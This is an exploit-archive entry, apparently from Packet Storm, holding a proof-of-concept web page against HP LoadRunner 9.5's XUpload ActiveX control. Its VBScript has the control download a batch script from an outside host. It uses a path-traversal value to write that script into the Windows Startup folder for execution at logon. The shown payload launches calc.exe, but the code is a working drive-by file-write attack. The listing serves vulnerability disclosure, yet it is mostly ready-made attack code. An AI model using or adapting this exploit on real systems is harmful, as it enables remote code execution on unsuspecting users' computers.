HP LoadRunner 9.5 File Creation

🗓️ 29 Sep 2009 00:00:00Reported by Nine:Situations:Group::pyrokinesisType

packetstorm🔗 packetstormsecurity.com👁 22 Views

HP LoadRunner 9.5 Persits.XUpload.2 remote file creation po

`<!--  
HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc  
(IE 8)  
by Nine:Situations:Group::pyrokinesis  
  
CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003}  
Progid: Persits.XUpload.2  
Binary Path: C:\Programmi\HP\LoadRunner\bin\XUpload.ocx  
KillBitted: False  
Implements IObjectSafety: True  
Safe For Initialization (IObjectSafety): True  
Safe For Scripting (IObjectSafety): True  
-->  
<html>  
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' />  
</object>  
<script language='vbscript'>  
  
' http://retrogod.altervista.org/sh_9232.txt , a batch script that starts calc.exe  
XUPLOADLib.Server = "retrogod.altervista.org"  
XUPLOADLib.Script = "sh_9232.txt"  
  
' place it in the Startup folder, italian path, change for your os  
Method=""  
Params=""  
Path="..\\..\\..\\Documents and Settings\All Users.WINDOWS\Menu Avvio\Programmi\Esecuzione automatica\\sh.cmd"  
UserAgent=""  
Headers=""  
XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers  
</script>  
  
`

29 Sep 2009 00:00Current

0.2Low risk

Vulners AI Score0.2

hp loadrunner persits.xupload.2 remote file creation internet explorer 8 clsid progid binary path killbitted iobjectsafety batch script calc.exe makehttprequest startup folder.